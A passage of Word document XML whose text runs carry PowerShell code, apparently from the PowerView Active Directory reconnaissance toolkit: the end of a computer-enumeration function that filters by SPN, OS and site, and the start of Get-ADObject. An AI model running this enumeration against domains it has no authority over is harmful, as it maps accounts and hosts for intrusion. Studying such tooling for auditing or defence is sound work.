        <w:t xml:space="preserve">                $Filter += "(servicePrincipalName=$SPN)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10982ECE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39484BAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($OperatingSystem) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C50EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filter += "(operatingsystem=$OperatingSystem)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130900C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F3E49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ServicePack) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B5639D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $Filter += "(operatingsystemservicepack=$ServicePack)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB69DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D8DF01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($SiteName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F03183" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filter += "(serverreferencebl=$SiteName)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA823B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066EF502" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69B9F2D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $CompFilter = "(&amp;(sAMAccountType=805306369)(dnshostname=$ComputerName)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA51265" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Get-NetComputer filter : '$CompFilter'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF77B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $CompSearcher.filter = $CompFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5FBAB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F89AF4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1017141D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $CompSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B48D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED5612E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Up = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDE0BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A31031" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # TODO: how can these results be piped to ping for a speedup?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B112B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2824C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151739B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Up) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370DD21C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # return full data objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28425198" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if ($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340EA65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6CE4AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Computer = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388DC5B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Computer.PSObject.TypeNames.Add('PowerView.Computer')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E61961" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63685E4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F6956D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF4E30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # otherwise we're just returning the DNS host name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF76E3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_.properties.dnshostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554CFC17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056FE7B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118CD11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FD580" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062E5E8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $CompSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEE12E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3757ECEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4329251A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning "Error: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C812A98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224BBC06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E78EB80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF659E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A2940" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CAD67B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="237003CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-ADObject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E140F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D64355B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F967D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="761CF640" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Takes a domain SID and returns the user, group, or computer object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501FE1F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        associated with it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722CD682" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D2E3D40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F09C30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="76A4B267" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The SID of the domain object you're querying for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D18DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="398FFBCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BBCAAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="365B3B92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The Name of the domain object you're querying for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65091904" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2911AB83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER SamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ED7A23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22735760" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The SamAccountName of the domain object you're querying for. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEBBC5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17A6285C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C670C77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78561029" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for objects, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B6FA6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EB1A8B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A2907B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="378D9F44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F23D2B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C57763F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32601878" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B97754F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C16A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D5B3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3721D58E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280A6A73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32A28AA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Additional LDAP filter string for the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AE1072" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50B9AED8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ReturnRaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E756E9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A211DDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return the raw object instead of translating its properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383239D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Used by Set-ADObject to modify object properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA1BC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E083752" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F2E10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2ED6FD98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CB8BA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03B89069" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88B55B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49A23A27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9DB8B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C345EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E5E7708" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790930E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70A58380" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ADObject -SID "S-1-5-21-2620891829-2411261497-1773853088-1110"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B2BC44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED2C6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get the domain object associated with the specified SID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE6CD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32A876" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875726F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CB3F5AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ADObject -ADSpath "CN=AdminSDHolder,CN=System,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE4B029" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4646E54B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get the AdminSDHolder object for the testlab.local domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D74444" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6562AC42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15774BBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA0D9B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC1AD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E8524" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B6AA85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB86E48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="216BA251" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393EAEF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CAA2F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CDA3C16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4002D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $SamAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9CCB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FEE934A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E957ACA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794696E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="539D76D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE482FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8264A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="245B2EDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59217481" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F56BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="772FCE13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0001B64D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB6423" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BFD8D74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69284A58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ReturnRaw,</w:t>
      </w:r>
    </w:p>
